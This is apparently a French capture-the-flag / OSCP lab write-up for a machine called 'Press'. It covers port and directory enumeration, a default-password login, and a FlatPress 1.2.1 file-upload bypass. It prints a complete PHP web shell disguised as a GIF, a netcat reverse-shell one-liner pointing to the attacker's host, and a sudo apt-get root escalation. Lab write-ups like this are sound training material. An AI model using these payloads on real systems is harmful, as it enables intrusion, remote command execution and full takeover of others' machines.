Press

flatpress file upload

Nom machine : Press
Difficulté : Intermédiaire
OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 17:15 EDT
Nmap scan report for 192.168.208.29
Host is up (0.035s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Lugx Gaming Shop HTML5 Template
8089/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-generator: FlatPress fp-1.2.1
|_http-title: FlatPress
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (8089)

┌──(kali㉿kali)-[~/oscp/pyload]
└─$ dirsearch -u http://192.168.208.29:8089/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/oscp/pyload/reports/http_192.168.208.29_8089/__24-08-27_17-17-11.txt

Target: http://192.168.208.29:8089/

[17:17:11] Starting: 
[17:17:13] 200 -  218B  - /.gitignore
[17:17:13] 403 -  281B  - /.ht_wsr.txt
[17:17:14] 403 -  281B  - /.htaccess.bak1
[17:17:14] 403 -  281B  - /.htaccess.orig
[17:17:14] 403 -  281B  - /.htaccess.sample
[17:17:14] 403 -  281B  - /.htaccess.save
[17:17:14] 403 -  281B  - /.htaccess_extra
[17:17:14] 403 -  281B  - /.htaccess_orig
[17:17:14] 403 -  281B  - /.htaccessBAK
[17:17:14] 403 -  281B  - /.htaccess_sc
[17:17:14] 403 -  281B  - /.htaccessOLD
[17:17:14] 403 -  281B  - /.htaccessOLD2
[17:17:14] 403 -  281B  - /.htm
[17:17:14] 403 -  281B  - /.html
[17:17:14] 403 -  281B  - /.htpasswd_test
[17:17:14] 403 -  281B  - /.htpasswds
[17:17:14] 403 -  281B  - /.httr-oauth
[17:17:14] 403 -  281B  - /.php
[17:17:17] 301 -  323B  - /admin  ->  http://192.168.208.29:8089/admin/
[17:17:17] 302 -    0B  - /admin.php  ->  http://192.168.208.29:8089/login.php
[17:17:17] 200 -  305B  - /admin/
[17:17:17] 200 -  305B  - /admin/index.php
[17:17:22] 200 -   10KB - /CHANGELOG.md
[17:17:23] 200 -    2KB - /contact.php
[17:17:24] 301 -  322B  - /docs  ->  http://192.168.208.29:8089/docs/
[17:17:24] 200 -  499B  - /docs/
[17:17:26] 404 -    5KB - /index.php/login/
[17:17:28] 200 -   18KB - /LICENSE.md
[17:17:28] 200 -    2KB - /login.php
[17:17:33] 200 -    2KB - /README.md
[17:17:34] 301 -    0B  - /rss.php  ->  http://192.168.208.29:8089/?x=feed:rss2&
[17:17:34] 200 -    3KB - /search.php
[17:17:34] 403 -  281B  - /server-status
[17:17:34] 403 -  281B  - /server-status/
[17:17:35] 200 -  305B  - /setup/
[17:17:35] 301 -  323B  - /setup  ->  http://192.168.208.29:8089/setup/
[17:17:36] 302 -    0B  - /static.php  ->  http://192.168.208.29:8089/

Le fichier /CHANGELOG.md nous fourni un numéro de version : Flatpress 1.2.1

Nous pouvons tenter de nous connecter en tant que admin:password

Accès initial

File Upload

Flatpress 1.2.1 - File upload bypass to RCE Vulnerebility · Issue #152 · flatpressblog/flatpressGitHub

┌──(kali㉿kali)-[~/oscp]
└─$ cat shellgif.php
GIF89a;
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.224 1234 >/tmp/f

┌──(kali㉿kali)-[~/oscp]
└─$ nc -lnvp 1234    
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.29] 60728
bash: cannot set terminal process group (601): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/var/www/flatpress/fp-content/attachs$ whoami
whoami
www-data

Elévation des privilèges

www-data@debian:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/apt-get

apt-get | GTFOBinsgtfobins.github.io

www-data@debian:/home$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
<apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
whoami
root

PrécédentPlum SuivantpyLoader

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (8089)

hashtagAccès initial

hashtagFile Upload

hashtagElévation des privilèges